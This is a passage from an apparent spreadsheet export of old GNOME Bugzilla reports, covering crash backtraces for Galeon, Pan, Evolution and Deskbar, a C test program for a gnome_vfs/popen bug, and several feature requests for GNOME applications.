#24 0x41401836 in NSGetModule () from /usr/lib/mozilla/components/libgkview.so
#25 0x4140b661 in NSGetModule () from /usr/lib/mozilla/components/libgkview.so
#26 0x414011a2 in NSGetModule () from /usr/lib/mozilla/components/libgkview.so
#27 0x40ef13ee in NSGetModule ()
   from /usr/lib/mozilla/components/libwidget_gtk.so
#28 0x40ef130e in NSGetModule ()
   from /usr/lib/mozilla/components/libwidget_gtk.so
#29 0x40ef1480 in NSGetModule ()
   from /usr/lib/mozilla/components/libwidget_gtk.so
#30 0x40ef20ae in NSGetModule ()
   from /usr/lib/mozilla/components/libwidget_gtk.so
#31 0x40ef59bd in NSGetModule ()
   from /usr/lib/mozilla/components/libwidget_gtk.so
#32 0x40eebbf2 in NSGetModule ()
   from /usr/lib/mozilla/components/libwidget_gtk.so
#33 0x40eeb8ed in NSGetModule ()
   from /usr/lib/mozilla/components/libwidget_gtk.so
#34 0x403ad16b in gdk_event_dispatch (source_data=0x0 
    current_time=0xbfffdc00 user_data=0x0) at gdkevents.c:2139
#35 0x40522055 in g_main_dispatch (dispatch_time=0xbfffdc00) at gmain.c:656
#36 0x40522659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#37 0x405227e8 in g_main_run (loop=0x8250830) at gmain.c:935
#38 0x402f265b in gtk_main () at gtkmain.c:524
#39 0x40032b47 in EmbedWindow::ShowAsModal () at eval.c:41
#40 0x40a5fa9b in NSGetModule ()
   from /usr/lib/mozilla/components/libembedcomponents.so
#41 0x40a5ea34 in NSGetModule ()
   from /usr/lib/mozilla/components/libembedcomponents.so
#42 0x4100c088 in NSGetModule () from /usr/lib/mozilla/components/libjsdom.so
#43 0x4100957c in NSGetModule () from /usr/lib/mozilla/components/libjsdom.so
#44 0x4143fc75 in NSGetModule ()
   from /usr/lib/mozilla/components/libxpinstall.so
#45 0x4143f7c7 in NSGetModule ()
   from /usr/lib/mozilla/components/libxpinstall.so
#46 0x4142bb83 in NSGetModule ()
   from /usr/lib/mozilla/components/libxpinstall.so
#47 0x4143319a in NSGetModule ()
   from /usr/lib/mozilla/components/libxpinstall.so
#48 0x40a1e147 in js_Invoke () from /usr/lib/libmozjs.so
#49 0x40a258d7 in js_Interpret () from /usr/lib/libmozjs.so
#50 0x40a1e19f in js_Invoke () from /usr/lib/libmozjs.so
#51 0x40a1e399 in js_InternalInvoke () from /usr/lib/libmozjs.so
#52 0x40a022c2 in JS_CallFunctionValue () from /usr/lib/libmozjs.so
#53 0x40ffef60 in NSGetModule () from /usr/lib/mozilla/components/libjsdom.so
#54 0x41022799 in NSGetModule () from /usr/lib/mozilla/components/libjsdom.so
#55 0x40c565b9 in NSGetModule ()
   from /usr/lib/mozilla/components/libgkcontent.so
#56 0x40c56d5f in NSGetModule ()
   from /usr/lib/mozilla/components/libgkcontent.so
#57 0x40db8578 in NSGetModule ()
   from /usr/lib/mozilla/components/libgkcontent.so
#58 0x40c8ca57 in NSGetModule ()
   from /usr/lib/mozilla/components/libgkcontent.so
#59 0x412d97cb in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
#60 0x412d96c7 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
#61 0x40c5ec5f in NSGetModule ()
   from /usr/lib/mozilla/components/libgkcontent.so
#62 0x40c5d3a6 in NSGetModule ()
   from /usr/lib/mozilla/components/libgkcontent.so
#63 0x412d9899 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
#64 0x412d9643 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
#65 0x41401836 in NSGetModule () from /usr/lib/mozilla/components/libgkview.so
#66 0x414017db in NSGetModule () from /usr/lib/mozilla/components/libgkview.so
#67 0x414017db in NSGetModule () from /usr/lib/mozilla/components/libgkview.so
#68 0x4140b661 in NSGetModule () from /usr/lib/mozilla/components/libgkview.so
#69 0x414011a2 in NSGetModule () from /usr/lib/mozilla/components/libgkview.so
#70 0x40ef13ee in NSGetModule ()
   from /usr/lib/mozilla/components/libwidget_gtk.so
#71 0x40ef130e in NSGetModule ()
   from /usr/lib/mozilla/components/libwidget_gtk.so
#72 0x40ef1480 in NSGetModule ()
   from /usr/lib/mozilla/components/libwidget_gtk.so
#73 0x40ef21ed in NSGetModule ()
   from /usr/lib/mozilla/components/libwidget_gtk.so
#74 0x40ef59cd in NSGetModule ()
   from /usr/lib/mozilla/components/libwidget_gtk.so
#75 0x40eebbf2 in NSGetModule ()
   from /usr/lib/mozilla/components/libwidget_gtk.so
#76 0x40eeb8aa in NSGetModule ()
   from /usr/lib/mozilla/components/libwidget_gtk.so
#77 0x403ad16b in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffff920 user_data=0x0) at gdkevents.c:2139
#78 0x40522055 in g_main_dispatch (dispatch_time=0xbffff920) at gmain.c:656
#79 0x40522659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#80 0x405227e8 in g_main_run (loop=0x8450560) at gmain.c:935
#81 0x402f265b in gtk_main () at gtkmain.c:524
#82 0x08089d35 in main () at eval.c:41
#83 0x4079b237 in __libc_start_main () from /lib/libc.so.6
#0  0x40839c09 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x408abd84 in __check_rhosts_file () from /lib/libc.so.6
No symbol table info available.
#2  0x4062b683 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x401ad262 in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = 1078020946
in_segv = 1
pid = 0
#4  0x406293cb in sigaction () from /lib/libpthread.so.0
No symbol table info available.
#5  0x407ac708 in killpg () from /lib/libc.so.6
No symbol table info available.
#6  0x08083ef0 in GaleonWrapper::GetMouseEventContext () at eval.c:41
	in eval.c
ap = (void **) 0xbfffc3d0
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x855ca74 Ã€4Ã¦@`4Ã¦@ 4Ã¦@Ã 3Ã¦@Ã€3Ã¦@\002
result = 3221210064
result = 139840116
#7  0x08092965 in mozilla_get_mouse_event_info () at eval.c:41
41	in eval.c
ap = (void **) 0x855ca74
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x81ff440 
result = 139840116
result = 136311872
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-07-24 16:57 -------
The original reporter (mark.young71@virgin.net) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component mpeseng@tin.it.
</t>
  </si>
  <si>
    <t>mark.young71</t>
  </si>
  <si>
    <t>DESKBAR-APPLET-473052</t>
  </si>
  <si>
    <t>crash in Deskbar: Starting gnom-panel with...</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
Starting gnom-panel with deskabr applet
Distribution: Mandriva Linux release 2008.0 (Cooker) for i586
Gnome Release: 2.19.6 2007-08-14 (Mandriva)
BugBuddy Version: 2.19.91
System: Linux 2.6.22-6mdv #1 SMP Thu Aug 16 19:24:03 CEST 2007 i686
X Vendor: The X.Org Foundation
X Vendor Release: 10300000
Selinux: No
Accessibility: Enabled
GTK+ Theme: LiNsta3
Icon Theme: nuoveXT.2.2
Memory status: size: 0 vsize: 0 resident: 0 share: 0 rss: 0 rss_rlim: 0
CPU usage: start_time: 0 rtime: 0 utime: 0 stime: 0 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 0
----------- .xsession-errors (8 sec old) ---------------------
bad image index
bad image index
bad image index
** Message: ATK_ROLE_TOOLTIP object found but doesn't look like a tooltip.
** Message: ATK_ROLE_TOOLTIP object found but doesn't look like a tooltip.
** Message: ATK_ROLE_TOOLTIP object found but doesn't look like a tooltip.
** Message: ATK_ROLE_TOOLTIP object found but doesn't look like a tooltip.
** Message: ATK_ROLE_TOOLTIP object found but doesn't look like a tooltip.
** Message: ATK_ROLE_TOOLTIP object found but doesn't look like a tooltip.
** Message: ATK_ROLE_TOOLTIP object found but doesn't look like a tooltip.
** Message: ATK_ROLE_TOOLTIP object found but doesn't look like a tooltip.
** Message: ATK_ROLE_TOOLTIP object found but doesn't look like a tooltip.
** Message: ATK_ROLE_TOOLTIP object found but doesn't look like a tooltip.
** Message: ATK_ROLE_TOOLTIP object found but doesn't look like a tooltip.
** Message: ATK_ROLE_TOOLTIP object found but doesn't look like a tooltip.
--------------------------------------------------
Traceback (most recent call last):
  File /usr/lib/python2.5/site-packages/deskbar/core/CoreImpl.py line 302 in on_module_initialized
    self._history.load()
  File /usr/lib/python2.5/site-packages/deskbar/core/DeskbarHistory.py line 119 in load
    if action.is_valid():
AttributeError: BeagleMatch instance has no attribute 'is_valid'</t>
  </si>
  <si>
    <t>tomasz.goral</t>
  </si>
  <si>
    <t>BUG-BUDDY-348863</t>
  </si>
  <si>
    <t>Don't set critical priority when --package is passed and no --pid</t>
  </si>
  <si>
    <t>When non-invoked from a crash/exception (--pakage present but no --pid neither --include file) file bugs as lower priority.
Maybe add a new param for priority</t>
  </si>
  <si>
    <t>GNOME-VFS-56368</t>
  </si>
  <si>
    <t>gnome_vfs_init breaks popen</t>
  </si>
  <si>
    <t>After calling gnome_vfs_init opening a pipe via popen and reading from it
produces garbage. This works fine before calling gnome_vfs_init.
Attached is a small program which demonstrates the problem:
#include 
#include 
#include 
static gchar*
sawfish_plugin_get_ext_version (void)
{
	FILE *pipe
	char ver[1000]
	char *str
	char *ret
	int len
	pipe = popen (sawfish --version r)
	if (!pipe)
		return NULL
	fgets (ver 1000 pipe)	
	pclose (pipe)
	return g_strdup (ver)
}
int
main (int argc char **argv)
{
	gchar *tmp
	g_thread_init (NULL)
	gnome_vfs_init ()
	tmp = sawfish_plugin_get_ext_version ()
	g_print (tmp)
	g_free (tmp)
	return 0
}</t>
  </si>
  <si>
    <t>BATTFINK-110840</t>
  </si>
  <si>
    <t>Should be able to turn off label</t>
  </si>
  <si>
    <t>I'd like to be able to turn off the label and just have the battery showing
the battery status as the tooltip is there if I want it.</t>
  </si>
  <si>
    <t>EVOLUTION-201667</t>
  </si>
  <si>
    <t>Ximian contact info outdated</t>
  </si>
  <si>
    <t>While testing a fresh install of the latest version Dave built I looked at the
default contact (for Ximian Inc.) which says that we're at 101 Rogers St.  We
should probably update this but I don't know that it's a terribly high
priority.</t>
  </si>
  <si>
    <t>F-SPOT-171603</t>
  </si>
  <si>
    <t>crashed when import picture with bad name</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. import any file named 'anything\anything.jpg'
Stack trace:
Unhandled Exception: System.IO.IOException:
/home/coquelle/Perso/Media/Img/Manga/manga/othello5.jpg
in [0x0001b] (at /home/cvs/1-mono/mcs/class/corlib/System.IO/File.cs:211)
System.IO.File:GetCreationTime (string)
in [0x00001] (at /home/cvs/1-mono/mcs/class/corlib/System.IO/File.cs:217)
System.IO.File:GetCreationTimeUtc (string)
in [0x00049] (at /dar/build/f-spot-0.0.12/src/PhotoStore.cs:526)
PhotoStore:Create (stringGdk.Pixbuf&amp;)
in [0x00055] (at /dar/build/f-spot-0.0.12/src/FileImportBackend.cs:95)
FileImportBackend:Step (Photo&amp;Gdk.Pixbuf&amp;int&amp;)
in [0x0004e] (at /dar/build/f-spot-0.0.12/src/ImportCommand.cs:234)
ImportCommand:DoImport (FileImportBackend)
in [0x00200] (at /dar/build/f-spot-0.0.12/src/ImportCommand.cs:372)
ImportCommand:ImportFromFile (PhotoStorestring)
in [0x0002a] (at /dar/build/f-spot-0.0.12/src/MainWindow.cs:829)
MainWindow:HandleImportCommand (objectSystem.EventArgs)
in  (wrapper delegate-invoke)
System.MulticastDelegate:invoke_void_object_EventArgs (objectSystem.EventArgs)
in  GtkSharp.voidObjectSignal:voidObjectCallback (intptrint)
in  (wrapper native-to-managed)
GtkSharp.voidObjectSignal:voidObjectCallback (intptrint)
in (unmanaged) (wrapper managed-to-native) Gtk.Application:gtk_main ()
in  (wrapper managed-to-native) Gtk.Application:gtk_main ()
in  Gtk.Application:Run ()
in  Gnome.Program:Run ()
in [0x0007c] (at /dar/build/f-spot-0.0.12/src/main.cs:31) Driver:Main (string[])
Other information:
in this stack trace the file which crash the application is:
/home/coquelle/Perso/Media/Img/Manga/manga\othello5.jpg</t>
  </si>
  <si>
    <t>lcoquelle</t>
  </si>
  <si>
    <t>GTK+-309291</t>
  </si>
  <si>
    <t>Remove wrapping in a menu bar</t>
  </si>
  <si>
    <t>Left/Right currently move focus with wrapping between the titles in a menu bar.
Support for wrapping should be removed for accessibility reasons. In addition
as with other controls where wrapping is not supported feedback should be
provided (e.g. a system warning beep) when users attempt to move focus beyond
the boundary of a menu bar.
Other information:</t>
  </si>
  <si>
    <t>fernande</t>
  </si>
  <si>
    <t>EVOLUTION-251209</t>
  </si>
  <si>
    <t>Alarm daemon starts Evo 1.4 wombat</t>
  </si>
  <si>
    <t>I've installed evo HEAD into my home drive but when I start evolution-1.5
I see that the alarm daemon and wombat from evo 1.4 are started.</t>
  </si>
  <si>
    <t>EPIPHANY-677240</t>
  </si>
  <si>
    <t>popup-commands: use g_get_user_special_dir API</t>
  </si>
  <si>
    <t>Don't hardcode Pictures.</t>
  </si>
  <si>
    <t>PAN-92378</t>
  </si>
  <si>
    <t>PAN crashed!</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Pan
Severity: normal
Version: 0.11.2
Synopsis: PAN crashed!
Bugzilla-Product: Pan
Bugzilla-Component: general
Description:
when i used the news client PAN to access the server 
news.cnool.netthe PAN crashed!!
Debugging Information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...[New Thread 1024 (LWP 1697)]
[New Thread 2049 (LWP 1698)]
[New Thread 1026 (LWP 1699)]
[New Thread 5123 (LWP 1719)]
0x420b4769 in wait4 () from /lib/i686/libc.so.6
#0  0x420b4769 in wait4 () from /lib/i686/libc.so.6
#1  0x4213030c in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x404e3ca3 in waitpid () from /lib/i686/libpthread.so.0
#3  0x4009dff8 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#4  0x404e1f75 in pthread_sighandler () from /lib/i686/libpthread.so.0
#5  
#6  0x42080b1b in strlen () from /lib/i686/libc.so.6
#7  0x40437d49 in g_printf_string_upper_bound () from /usr/lib/libglib-1.2.so.0
#8  0x40437561 in g_strdup_vprintf () from /usr/lib/libglib-1.2.so.0
#9  0x080bc30f in log_add_va ()
#10 0x0809453f in nntp_grouplist_download_all ()
#11 0x08093f9d in task_grouplist_run ()
#12 0x08091b88 in task_run ()
#13 0x0808c968 in queue_run_thread ()
#14 0x404defef in pthread_start_thread () from /lib/i686/libpthread.so.0
#0  0x420b4769 in wait4 () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x4213030c in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x404e3ca3 in waitpid () from /lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4009dff8 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#4  0x404e1f75 in pthread_sighandler () from /lib/i686/libpthread.so.0
No symbol table info available.
#5  
No symbol table info available.
#6  0x42080b1b in strlen () from /lib/i686/libc.so.6
No symbol table info available.
#7  0x40437d49 in g_printf_string_upper_bound () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-09-03 02:20 -------
The original reporter (davidtwo@163.net) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component charles@rebelbase.com.
</t>
  </si>
  <si>
    <t>davidtwo</t>
  </si>
  <si>
    <t>GTKSOURCEVIEW-317861</t>
  </si>
  <si>
    <t>sourceview is ignoring tab settings which are set before it is mapped or realized.</t>
  </si>
  <si>
    <t>Distribution/Version: Gentoo
[This is kind of a forward of a bug from Meld.]
In Meld I have my tab width set to 4.  However when I start a new file
comparison the tab width is visually 8.  If I open the preferences however the
tab width entry is set to 4.  If I change the tab width the visual reacts
properly.
Stephen Kennedy dug into it and responded:
This is very strange. If sourceview is disabled or not available
(comment out the block at filediff.py:41) it works as expected.
In fact if we add as the last line of __init__ (line 193)
 gtk.idle_add( lambda *args: self.load_font() )
the problem goes away. It seems like sourceview is ignoring
tab settings which are set before it is mapped or realized.
Can you chase this up with the sourceview devs?
Original Bug:
http://bugzilla.gnome.org/show_bug.cgi?id=316730</t>
  </si>
  <si>
    <t>gnome_bugzilla_peep</t>
  </si>
  <si>
    <t>EVOLUTION-320736</t>
  </si>
  <si>
    <t>crash connecting to groupwise7</t>
  </si>
  <si>
    <t xml:space="preserve">
Distribution: Opensuse 10.0
Package: Evolution
Severity: normal
Version: GNOME2.12.0 unspecified
Gnome-Distributor: SUSE
Synopsis: imap4 crash connecting to groupwise7
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Bugzilla-Version: unspecified
BugBuddy-GnomeVersion: 2.0 (2.12.0)
Description:
Description of the crash:
Evolution crashes when it refreshes summary header information on
groupwise 7 imap account
Steps to reproduce the crash:
1. setup evolution as groupwise accnt with soap and imap (not using
ssl)
2. initial download of mail headers appears to work fine
3. continue to browse imap folders or close and re-open evolution and it
will crash upon initiating imap connection
Expected Results:
Should syncronize imap mail headers with server removing deleted and
grabbing new ones for listing.
How often does this happen?
all the time after initial setup and imap mail download. tested with multiple 
users on same machine
Additional Information:
opensuse 10.0 and evolution 2.4.0-0.3.2 from YOU also happens in both
gnome and KDE
Debugging Information:
Backtrace was generated from '/opt/gnome/bin/evolution-2.4'
Using host libthread_db library /lib/tls/libthread_db.so.1.
`system-supplied DSO at 0xffffe000' has disappeared keeping its
symbols.
[Thread debugging using libthread_db enabled]
[New Thread 1096986336 (LWP 15096)]
[New Thread 1249823664 (LWP 15110)]
[Thread debugging using libthread_db enabled]
[New Thread 1096986336 (LWP 15096)]
[New Thread 1249823664 (LWP 15110)]
[Thread debugging using libthread_db enabled]
[New Thread 1096986336 (LWP 15096)]
[New Thread 1249823664 (LWP 15110)]
[New Thread 1160317872 (LWP 15109)]
[New Thread 1158216624 (LWP 15108)]
[New Thread 1155722160 (LWP 15107)]
[New Thread 1153620912 (LWP 15105)]
[New Thread 1151019952 (LWP 15099)]
[New Thread 1148525488 (LWP 15098)]
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0x4159a482 in poll () from /lib/tls/libc.so.6
#2  0x4121e61c in g_main_context_check () from
/opt/gnome/lib/libglib-2.0.so.0
#3  0x4121eae7 in g_main_loop_run () from
/opt/gnome/lib/libglib-2.0.so.0
#4  0x40a91c83 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
#5  0x0805ef70 in main (argc=2680 argv=0xbf9f6fe4) at main.c:602
Thread 8 (Thread 1148525488 (LWP 15098)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0x40b7fa76 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x404add3a in e_msgport_wait (mp=0x817e410) at e-msgport.c:511
	_buffer = {__routine = 0x404ada90  
  __arg = 0x817e410 __canceltype = 138421512 __prev = 0x0}
	msg = 
#3  0x404ae4c3 in thread_dispatch (din=0x817e3b8) at e-msgport.c:874
	e = 
	m = (EMsg *) 0x0
	info = 
	self = 1148525488
#4  0x40b7d297 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0x415a437e in clone () from /lib/tls/libc.so.6
No symbol table info available.
#6  0x44751bb0 in ?? ()
No symbol table info available.
Thread 7 (Thread 1151019952 (LWP 15099)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0x40b7fa76 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x404add3a in e_msgport_wait (mp=0x817e410) at e-msgport.c:511
	_buffer = {__routine = 0x404ada90  
  __arg = 0x817e410 __canceltype = 139848784 __prev = 0x0}
	msg = 
#3  0x404ae4c3 in thread_dispatch (din=0x817e3b8) at e-msgport.c:874
	e = 
	m = (EMsg *) 0x0
	info = 
	self = 1151019952
#4  0x40b7d297 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0x415a437e in clone () from /lib/tls/libc.so.6
No symbol table info available.
#6  0x449b2bb0 in ?? ()
No symbol table info available.
Thread 6 (Thread 1153620912 (LWP 15105)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0x40b7fa76 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x404add3a in e_msgport_wait (mp=0x817e410) at e-msgport.c:511
	_buffer = {__routine = 0x404ada90  
  __arg = 0x817e410 __canceltype = 1085795591 __prev = 0x0}
	msg = 
#3  0x404ae4c3 in thread_dispatch (din=0x817e3b8) at e-msgport.c:874
	e = 
	m = (EMsg *) 0x0
	info = 
	self = 1153620912
#4  0x40b7d297 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0x415a437e in clone () from /lib/tls/libc.so.6
No symbol table info available.
#6  0x44c2dbb0 in ?? ()
No symbol table info available.
Thread 5 (Thread 1155722160 (LWP 15107)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0x40b8342b in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x406939e5 in libgnomeui_module_info_get ()
   from /opt/gnome/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#5  0x4150d541 in raise () from /lib/tls/libc.so.6
No symbol table info available.
#6  0x4150edbb in abort () from /lib/tls/libc.so.6
No symbol table info available.
#7  0x41225120 in g_logv () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#8  0x41225165 in g_log () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#9  0x444c975e in groupwise_folder_item_to_msg (folder=0x83f5628 
    item=0x45322738 ex=0x0) at camel-groupwise-folder.c:1394
	reply_within = 
	mess = 0x45322ea8
418A6C63.jdm_dom.jdm_po.100.1786233.1.4FFFD.1@1:3A276F9F.jdm_dom.jdm_po.100.1786233.1.2373.1@13
	msg = (CamelMimeMessage *) 0x453014f4
	gw_store = (CamelGroupwiseStore *) 0x814f018
	priv = (CamelGroupwiseStorePrivate *) 0x45323098
	attach_list = (GSList *) 0x8396db0
	type = 
	status = 
	cnc = (EGwConnection *) 0x83bbfb8
	multipart = (CamelMultipart *) 0x4530f658
	body = 0x0
	uid = 0x45322ea8
418A6C63.jdm_dom.jdm_po.100.1786233.1.4FFFD.1@1:3A276F9F.jdm_dom.jdm_po.100.1786233.1.2373.1@13
#10 0x444cafa8 in groupwise_refresh_folder (folder=0x83f5628 ex=0x0)
    at camel-groupwise-folder.c:1125
	al = 
	attach = (EGwItemAttachment *) 0x45322f10
	gw_store = (CamelGroupwiseStore *) 0x814f018
	gw_folder = 
	summary = (CamelGroupwiseSummary *) 0x8405f24
	cnc = (EGwConnection *) 0x83bbfb8
	session = (CamelSession *) 0x812a068
	is_proxy = 0
	is_locked = 
	list = (GList *) 0x84dd204
	slist = (GSList *) 0x0
	sl = 
	container_id = 0x4531c5a0
3A276F9F.jdm_dom.jdm_po.100.1786233.1.2373.1@13
	time_string = 0x4531c5d8 2005-11-04T16:55:21Z
	t_str = 0x0
#11 0x444cb1ef in groupwise_refresh_info (folder=0x83f5628 ex=0x0)
    at camel-groupwise-folder.c:799
No locals.
#12 0x4406ad8e in camel_folder_refresh_info ()
   from /opt/gnome/lib/libcamel-provider-1.2.so.6
No symbol table info available.
#13 0x443589fd in mail_check_service ()
   from /opt/gnome/lib/evolution/2.4/components/libevolution-mail.so
No symbol table info available.
#14 0x443528d3 in mail_enable_stop ()
   from /opt/gnome/lib/evolution/2.4/components/libevolution-mail.so
No symbol table info available.
#15 0x404ae458 in thread_dispatch (din=0x6) at e-msgport.c:826
	e = 
	m = (EMsg *) 0x817e3b8
	info = 
	self = 1155722160
#16 0x40b7d297 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#17 0x415a437e in clone () from /lib/tls/libc.so.6
No symbol table info available.
#18 0x44e2ebb0 in ?? ()
No symbol table info available.
Thread 4 (Thread 1158216624 (LWP 15108)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0x40b7fa76 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x404add3a in e_msgport_wait (mp=0x817eae8) at e-msgport.c:511
	_buffer = {__routine = 0x404ada90  
  __arg = 0x817eae8 __canceltype = 138421392 __prev = 0x0}
	msg = 
#3  0x404ae4c3 in thread_dispatch (din=0x817ea90) at e-msgport.c:874
	e = 
	m = (EMsg *) 0x0
	info = 
	self = 1158216624
#4  0x40b7d297 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0x415a437e in clone () from /lib/tls/libc.so.6
No symbol table info available.
#6  0x4508fbb0 in ?? ()
No symbol table info available.
Thread 3 (Thread 1160317872 (LWP 15109)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0x40b7fa76 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x404add3a in e_msgport_wait (mp=0x81785f8) at e-msgport.c:511
	_buffer = {__routine = 0x404ada90  
  __arg = 0x81785f8 __canceltype = 139185088 __prev = 0x0}
	msg = 
#3  0x404ae4c3 in thread_dispatch (din=0x817eb38) at e-msgport.c:874
	e = 
	m = (EMsg *) 0x0
	info = 
	self = 1160317872
#4  0x40b7d297 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0x415a437e in clone () from /lib/tls/libc.so.6
No symbol table info available.
#6  0x45290bb0 in ?? ()
No symbol table info available.
Thread 2 (Thread 1249823664 (LWP 15110)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0x40b7fa76 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x404add3a in e_msgport_wait (mp=0x453102f0) at e-msgport.c:511
	_buffer = {__routine = 0x404ada90  
  __arg = 0x453102f0 __canceltype = 1160860504 __prev = 0x0}
	msg = 
#3  0x404ae4c3 in thread_dispatch (din=0x453128b8) at e-msgport.c:874
	e = 
	m = (EMsg *) 0x0
	info = 
	self = 1249823664
#4  0x40b7d297 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0x415a437e in clone () from /lib/tls/libc.so.6
No symbol table info available.
#6  0x4a7ecbb0 in ?? ()
No symbol table info available.
Thread 1 (Thread 1096986336 (LWP 15096)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0x4159a482 in poll () from /lib/tls/libc.so.6
No symbol table info available.
#2  0x4121e61c in g_main_context_check () from
/opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x4121eae7 in g_main_loop_run () from
/opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#4  0x40a91c83 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
No symbol table info available.
#5  0x0805ef70 in main (argc=2680 argv=0xbf9f6fe4) at main.c:602
	fd = 
	options = {{longName = 0x8062e41 component shortName = 99 'c' 
    argInfo = 1 arg = 0x8064cb4 val = 0 
    descrip = 0x8062ca8 Start Evolution activating the specified
component 
    argDescrip = 0x0} {longName = 0x805f736 offline shortName = 0
'\0' 
    argInfo = 0 arg = 0x8064cb0 val = 0 
    descrip = 0x8062e4b Start in offline mode argDescrip = 0x0} {
    longName = 0x8062a77 online shortName = 0 '\0' argInfo = 0 
    arg = 0x8064cac val = 0 descrip = 0x8062e61 Start in online
mode 
    argDescrip = 0x0} {longName = 0x8062e76 force-shutdown 
    shortName = 0 '\0' argInfo = 0 arg = 0x8064ca8 val = 0 
    descrip = 0x8062cdc Forcibly shut down all Evolution components 
    argDescrip = 0x0} {longName = 0x8062e85 debug shortName = 0
'\0' 
    argInfo = 1 arg = 0x8064ca4 val = 0 
    descrip = 0x8062d08 Send the debugging output of all components to
a file. argDescrip = 0x0} {longName = 0x8062e8b disable-eplugin 
    shortName = 0 '\0' argInfo = 0 arg = 0x8064ca0 val = 0 
    descrip = 0x8062d40 Disable loading of any plugins. argDescrip =
0x0} {
    longName = 0x8062e9b setup-only shortName = 0 '\0' 
    argInfo = 1073741824 arg = 0x8064c9c val = 0 descrip = 0x0 
    argDescrip = 0x0} {longName = 0x0 shortName = 0 '\0' argInfo = 0
    arg = 0x0 val = 0 descrip = 0x0 argDescrip = 0x0}}
	uri_list = (GSList *) 0x0
	popt_context_value = {g_type = 0 data = {{v_int = 0 v_uint = 0 
      v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long =
0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0}}}
	program = (GnomeProgram *) 0x806bfb8
	args = 
	evolution_directory = 
	icon_list = 
#0  0xffffe410 in __kernel_vsyscall ()
------- Bug moved to this database by unknown@gnome.bugs 2005-11-05 03:13 UTC -------
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here unknown@gnome.bugs.
   Previous reporter was rodc@ravenet.ca.
</t>
  </si>
  <si>
    <t>rodc</t>
  </si>
  <si>
    <t>VTE-499891</t>
  </si>
  <si>
    <t>vte with opacity set shows invisible chars</t>
  </si>
  <si>
    <t>with white color on the widget's grey background.  Not sure whose fault is it vteapp or vte widget.</t>
  </si>
  <si>
    <t>RHYTHMBOX-382376</t>
  </si>
  <si>
